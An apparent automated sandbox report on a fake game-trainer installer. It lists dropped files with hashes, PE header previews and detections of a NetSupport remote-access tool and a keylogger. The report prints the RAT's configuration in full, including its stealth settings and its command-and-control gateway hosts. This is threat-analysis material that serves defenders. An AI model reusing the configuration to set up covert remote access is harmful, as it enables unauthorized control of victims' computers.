                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................:.......Q...................................#...~.......F.......Rich............PE..L.....I...........!.........P.......@.......................................0..............................................h...(................................&...................................................................................text............................... ..`.rdata..]#.......0..................@..@.data............@..................@....rsrc................P..............@..@.reloc..(1.......@...`..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4869192
                                                                                                                                                                                                                                                                        Entropy (8bit):5.649617428876888
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:rXKBzQgiHMgpAdG2QyVkj1LkQWtdrT5ftjdKBc/uGiPg0qHpJEvBl5ViHlXzf:raFRi0SWbTdmcGGogpgPidD
                                                                                                                                                                                                                                                                        MD5:9A1F37F923A45C9C36816F87F75FF3FD
                                                                                                                                                                                                                                                                        SHA1:29E4C1CA3285DE8F6D72F0395BB881C7C44E8621
                                                                                                                                                                                                                                                                        SHA-256:8F29C2E143B8BA52A57623D5FE28B96FAE1B168466E0DAAABBC3B73BCB9418E1
                                                                                                                                                                                                                                                                        SHA-512:EB2D9F7006784ADD1B710DEE7A0A4AC697AA957511662226124B9DC8C8012CAB90B4E3D12EC28C5B01A27415BDF5ED2205C0531B0849BCAB12CDDECF5E624144
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........m'...t...t...t..u...t..u...t..uI..t...u...t...u...t...u...t..u...t...t(..tI..u...tI..u...t%..u...t...u...t...u...t...t...t..t...t...u...tRich...t........PE..d...U\+b.........." ......7.........p.........................................K......yJ...`.........................................`.B.l....zH.......H.Y.....E..f....J.H....`J..]...2;.8....................H;.(....2;.8............pH..............................text...=.7.......7................. ..`.rdata....... 7.......7.............@..@.data........B..:....A.............@....pdata..(.....E......2E.............@..@.idata..d(...pH..*....G.............@..@.tls..........H.......H.............@....00cfg..Q.....H.......H.............@..@_RDATA..".....H.......H.............@..@.rsrc...Y.....H.......H.............@..@.reloc......`J.......I.............@..B................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):694992
                                                                                                                                                                                                                                                                        Entropy (8bit):5.697661316832979
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:uQ4Bm+4SZrcVjqb/suCl37UToyzhsmNjV+1eiXy+RkEdYfELMwlHlZWHlIZE:tSZaEQ7Uow+mN5+1eqy+RkEdYfOE
                                                                                                                                                                                                                                                                        MD5:D26FB663EC89C51598B076126E843850
                                                                                                                                                                                                                                                                        SHA1:5D776FFDDAF296FE76E8756E4E28836767F3C267
                                                                                                                                                                                                                                                                        SHA-256:DE5709157472DF4CDD280CED1BF0873C495D81E2116D16E13D8482723C44EEA9
                                                                                                                                                                                                                                                                        SHA-512:57C07A25773742A7A481469A8394C34AE8E6E2F7F366DDE5EEAB2E0E95838FB1AB53E9628B313FE184E2FF71C015C8439E9D70FBF1D724B2C77F72B2552FCDD2
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-J9JTN.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ca...........!.....P... ......Nf... ........... ..............................^]....`..................................e..O.................................................................................... ............... ..H............text...TF... ...P.................. ..`.rsrc................`..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):271664
                                                                                                                                                                                                                                                                        Entropy (8bit):6.551014936864254
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:xDvjgU3XLSViNNi7UfdBYb/7tuko2Xf/tnQY:NgU3XLSV6z2PV1
                                                                                                                                                                                                                                                                        MD5:359319DD193FCA3782CE4A446E2976DD
                                                                                                                                                                                                                                                                        SHA1:A2A6835A831906BBEFB6E28244CA25205FC70319
                                                                                                                                                                                                                                                                        SHA-256:CA98F7673DF0AED9D8E2EDE2403394C68B58C4176DAE232E40EBA2BDD329C8A1
                                                                                                                                                                                                                                                                        SHA-512:74D6AE42F44B5C241DD9D7F454F33959ED42A847728AA6D492699462D9FA5592CCF0396BF8300722D85F2647F001B7A9C03C910B9BE38E80F49C0F72337BDCA1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@aU..2U..2U..2...2V..2..n2N..2..22...2..s2\..2U./2...2..32b..2...2T..2..k2T..2U..2T..2...2T..2RichU..2........PE..L...<..I...........!.....p.........................e......................... .......m......................................hs..d.......................0.......X...@...................................................4............................text...*e.......p.................. ..`.rdata..............................@..@.data....L.......@..................@....rsrc...............................@..@.reloc..N%.......0..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):753664
                                                                                                                                                                                                                                                                        Entropy (8bit):5.785456905272525
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:WZuUoUqrbs7TpCjxH4pxxo5CS06Nf637tBnN8JwqxhCbKjDp:WAUk0pCBgxxo8rWtjDp
                                                                                                                                                                                                                                                                        MD5:38A3875F7A2169645FEE066FD4E25572
                                                                                                                                                                                                                                                                        SHA1:5E72581C0C0ECE95BDA361CC08D50C6A7A18602E
                                                                                                                                                                                                                                                                        SHA-256:D3E374E75C33391E7D5A127E21A603F29241F6C3AC35B4F5766EA14AB49A8BDA
                                                                                                                                                                                                                                                                        SHA-512:4A54064BF78E8A506B5F8AE80F93BE584420D82515044C0D5DE8C294BC89653BDAB54142E3C1E53EC934CBF6A016A9DAEDA2008DD9DD90E306D31E8285D85B0D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....pP...........!.....P... .......k... ........... ..............................-.....@..................................k..O...................................4k............................................... ............... ..H............text....L... ...P.................. ..`.rsrc................`..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        File Type:InnoSetup Log VxCXHgOKWFitaVL Corporation, version 0x418, 37403 bytes, 494126\37\user\37, C:\Program Files (x86)\VxCXHgOKWFitaVL Cor
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):37403
                                                                                                                                                                                                                                                                        Entropy (8bit):3.278341815022819
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:xo4v0y3GefV3o5S559zQZkut4UwtGB6JS1GkAjYJ62KuOA1RVe1dDoO9IUVc6fZR:xo4dRNYQDpZ2cec23bA
                                                                                                                                                                                                                                                                        MD5:59C415966A53AFAA3F11F577D07279A3
                                                                                                                                                                                                                                                                        SHA1:2C9E7812A91B05D95CA250483A16AE796002A4BA
                                                                                                                                                                                                                                                                        SHA-256:DF55014BF3B6CF8AF98ED461E3B11ADE39361B7E8C7AFD7D0E563DD32566EAB1
                                                                                                                                                                                                                                                                        SHA-512:81A6CE4072CAD2F5CDFA28A34A0D75BC8BB66DB8299AC2DF290DA54D30E2BCCF273AAADCE3FAE03BFC234EE7BE74783D0F5C2739193BFDEF1A420AEA27894FF7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:Inno Setup Uninstall Log (b)....................................VxCXHgOKWFitaVL Corporation.....................................................................................................VxCXHgOKWFitaVL Corporation.................................................................................................................................................................................................................................xtu.........X..................4.9.4.1.2.6......a.l.f.o.n.s......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.V.x.C.X.H.g.O.K.W.F.i.t.a.V.L. .C.o.r.p.o.r.a.t.i.o.n................!...V.. ...........{..IFPS....A...4....................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM......... ..................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3223613
                                                                                                                                                                                                                                                                        Entropy (8bit):6.312183785282604
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:OWGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbQ333TYc:CtLutqgwh4NYxtJpkxhGj333T1
                                                                                                                                                                                                                                                                        MD5:969FAC0021669F20BEBF6D088812BD10
                                                                                                                                                                                                                                                                        SHA1:C5FA90BA1C91098C8ED3FAA3749D2159F09D85FB
                                                                                                                                                                                                                                                                        SHA-256:4A2117890D87BD8660836930D4FA1D8F75F772E5D3F06CD215516F153E16B4B2
                                                                                                                                                                                                                                                                        SHA-512:86869B5EE053FC44485CD373510526D06AACB5E80065F977515C151E2266E2BDC82A66632407AAD9BA1F4AECC71045D2364B59D79FC034159902331E690D0227
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9...................................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp
                                                                                                                                                                                                                                                                        File Type:InnoSetup Log river-city-rival-showdown-trainer-15-v1-8-.exe, version 0x418, 6507 bytes, 494126\37\user\37, C:\Program Files (x86)\river-city-rival-sh
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6507
                                                                                                                                                                                                                                                                        Entropy (8bit):4.2056181051940875
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:5PV/JR1ganROWUTMCdR3nZd3WMOdR3n5Ehk3w1nQsrCVbcuJlEDA4MZAe2LJiHhR:bz1gaZVCdRpvOdRifWbP4DSmJiHrD
                                                                                                                                                                                                                                                                        MD5:8C301620346E2785939A582B890914D5
                                                                                                                                                                                                                                                                        SHA1:2D1D487ED2BDAE103E125247F40C3353E20699B5
                                                                                                                                                                                                                                                                        SHA-256:A45CCCF66EC3EDFD3976C11A13D4B32C09518641EDB58AE6A1316771D630A657
                                                                                                                                                                                                                                                                        SHA-512:9415DEECC0DC834A088266EE04BE529E9B709C56A6767AEAA8880223737D2EB6B5C4AF471C12AA34DB60CA57BE1E46A77566EA683B923A44970DC0FF2F76AD5F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:Inno Setup Uninstall Log (b)....................................river-city-rival-showdown-trainer-15-v1-8-.exe..................................................................................river-city-rival-showdown-trainer-15-v1-8-.exe..........................................................................................k.............................................................................................................................K.g'...............4.9.4.1.2.6......a.l.f.o.n.s..v...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.r.i.v.e.r.-.c.i.t.y.-.r.i.v.a.l.-.s.h.o.w.d.o.w.n.-.t.r.a.i.n.e.r.-.1.5.-.v.1.-.8.-...e.x.e................!...... ....."........IFPS....'........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPR
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):396664
                                                                                                                                                                                                                                                                        Entropy (8bit):6.80911343409989
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                                                                                                                                                                                                                        MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                                                                                                                                                                                                                        SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                                                                                                                                                                                                                        SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                                                                                                                                                                                                                        SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\078630d72d217d4d9885ece5b71fe988.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):18808
                                                                                                                                                                                                                                                                        Entropy (8bit):6.292094060787929
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                                                                                                                                                                                                                        MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                                                                                                                                                                                                                        SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                                                                                                                                                                                                                        SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                                                                                                                                                                                                                        SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\2041dcc7124af9419b0b672e9d7171f7.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):46
                                                                                                                                                                                                                                                                        Entropy (8bit):4.532048032699691
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                                                                                                                                                                        MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                                                                                                                                                                        SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                                                                                                                                                                        SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                                                                                                                                                                        SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):376072
                                                                                                                                                                                                                                                                        Entropy (8bit):6.495222984508597
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:uRcacQeYcNF3/zKBxjJlbOG4LaiC9/ximuL86Y:WcMe9F3/zKBXIG4L8uY
                                                                                                                                                                                                                                                                        MD5:2B75E4A56F5ECFEDDEF0328575F15F40
                                                                                                                                                                                                                                                                        SHA1:E5954A74FCA52D15979537A9670DB8A983B34A71
                                                                                                                                                                                                                                                                        SHA-256:F53237F6FB79810D85E14A5DA7EE683C42928CBD8B4BD1EBD4B8204ED2FE220C
                                                                                                                                                                                                                                                                        SHA-512:0987C75FFE1944DDC0EDEC449C51C4C6B243058204E320849847844AAD5E231AEFCC3A5258D086280BA785E6A17CD0D00573E3C2FF1FEFC964846EA476FADEDE
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.=._.n._.n._.n._.n._.nr..n._.nr..n._.nr..n._.nr..n._.nr..n._.nr..n._.nr..n._.nRich._.n................PE..d......`.........." .....D...t......\................................................1....`.....................................................(.......H........ .......!......d... Q...............................................P...............................text...g>.......@.................. ..h.rdata..@....P.......D..............@..H.data....x... ...Z..................@....pdata... ......."...b..............@..HINIT................................ ....rsrc...H...........................@..B.reloc..d...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3740024
                                                                                                                                                                                                                                                                        Entropy (8bit):6.527276298837004
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                                                                                                                                                                                                                        MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                                                                                                                                                                                                                        SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                                                                                                                                                                                                                        SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                                                                                                                                                                                                                        SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\51ccd7e4634de4468d3b8ec370ae3220.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\51ccd7e4634de4468d3b8ec370ae3220.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):120232
                                                                                                                                                                                                                                                                        Entropy (8bit):5.257399420433021
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:thVZl6FhWr80/MqUr2pe/vP+KFKcMkS5r2pe/giTKFKcMkQA:t10hGUq0ee/v2IrIee/gqIrEA
                                                                                                                                                                                                                                                                        MD5:261D6E9D4571D1938CB54A2AE1B1821D
                                                                                                                                                                                                                                                                        SHA1:CA3ED46EDC92D901B33D8E7681883CAF861750A0
                                                                                                                                                                                                                                                                        SHA-256:168FCF4F6FD77A9498C79EF6CC95CC8CE4CB7D0CECF0D4A4D8A6AFF9397AB6E9
                                                                                                                                                                                                                                                                        SHA-512:B15E6E01A809449CC87F8949034A8DE08ED8EF18549001F55096FA47A398BEE18AE2BC11CC184B2F9A259CF97B230BBE50E4D010CF9F87917E8452245A835231
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\5d7fc0667d8a0e48a42ebd70bdd0c76a.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.g.W.g.W.g.^...U.g.8...T.g.W.f.R.g.8..V.g.8...V.g.8...V.g.RichW.g.........PE..L...6..d.....................r...... ........ ....@.......................................@.................................< ..<....0..Hm...........x...].......... ............................................... ...............................text............................... ..`.rdata..^.... ......................@..@.rsrc...Hm...0...n..................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):646
                                                                                                                                                                                                                                                                        Entropy (8bit):5.3690005693375875
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:NBhzd+mPfGS53Jv+Zlnx8Y8o5kLXfDWQsWS/nmSuqRlIB57JV:NBhzEmPfT+Zlnx81cefDiW8hKxj
                                                                                                                                                                                                                                                                        MD5:36782AC6A1032FC4C7E1FF0C1232A604
                                                                                                                                                                                                                                                                        SHA1:5E376A12188D84C2197F0012DD9E6D2B66653B0E
                                                                                                                                                                                                                                                                        SHA-256:E58186641FF4472C3769BB2A6D933C7972047D9DBFAA7593CA8A2BA1FDC391CE
                                                                                                                                                                                                                                                                        SHA-512:B736FC974DE8CDBE90146B15BA5F5CC88775E92C42FB99C40353694BED5781E5E9AC056E22F995F979D6DA93ACE4C8D2CE5976D4011BE8769B15101F768E2373
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:0x3d37c3a8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=2,3..SecurityKeyU=dgAAACpmqmo0Mx6cb1DyGq8RRCAA..SKMode=1..SysTray=0..UsernamesU=*..ValidAddresses.TCP=*....[_Info]..Filename=C:\ProgramData\regid.1993-06.com.microsoft\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..Passwordu=....[HTTP]..GatewayAddress=myptofgrtulo.info:1203..GSKU=EN:I?NDB9L<PAGEM:C?FDH9P>ECOGF..Port=1203..SecondaryGateway=peweoklope.com:1203..SecondaryPort=1203..
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):63864
                                                                                                                                                                                                                                                                        Entropy (8bit):6.446503462786185
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                                                                                                                                                                                                                        MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                                                                                                                                                                                                                        SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                                                                                                                                                                                                                        SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                                                                                                                                                                                                                        SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                                                                                                                                                                                                                        Malicious:true
